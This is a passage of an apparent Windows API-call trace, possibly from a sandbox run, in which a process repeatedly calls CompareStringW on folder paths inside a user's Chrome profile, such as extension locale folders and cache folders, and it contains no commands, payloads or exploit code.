Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\", cchCount2=128) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\", cchCount2=128) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\", cchCount2=128) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\", cchCount2=131) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\", cchCount2=131) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\", cchCount2=131) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\", cchCount2=131) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\", cchCount2=131) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\", cchCount2=142) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\", cchCount2=142) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\", cchCount2=142) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\", cchCount2=142) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\", cchCount2=142) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\", cchCount1=142, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\", cchCount2=133) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\", cchCount2=133) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\", cchCount2=133) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\", cchCount2=133) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\", cchCount2=133) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\", cchCount2=133) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\", cchCount2=133) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\", cchCount2=133) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\", cchCount2=131) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\", cchCount2=131) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\", cchCount2=131) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\", cchCount2=131) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\", cchCount2=131) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\", cchCount2=131) returned 3 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\", cchCount2=130) returned 1 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\", cchCount2=130) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\", cchCount2=130) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\", cchCount2=130) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\", cchCount2=130) returned 1 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\", cchCount2=130) returned 1 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\", cchCount2=130) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\", cchCount2=130) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\", cchCount2=130) returned 1 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\", cchCount2=130) returned 1 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\", cchCount2=130) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\", cchCount2=130) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\", cchCount2=133) returned 1 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount1=129, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\", cchCount2=133) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\", cchCount2=133) returned 1 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\", cchCount2=133) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\", cchCount2=133) returned 1 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 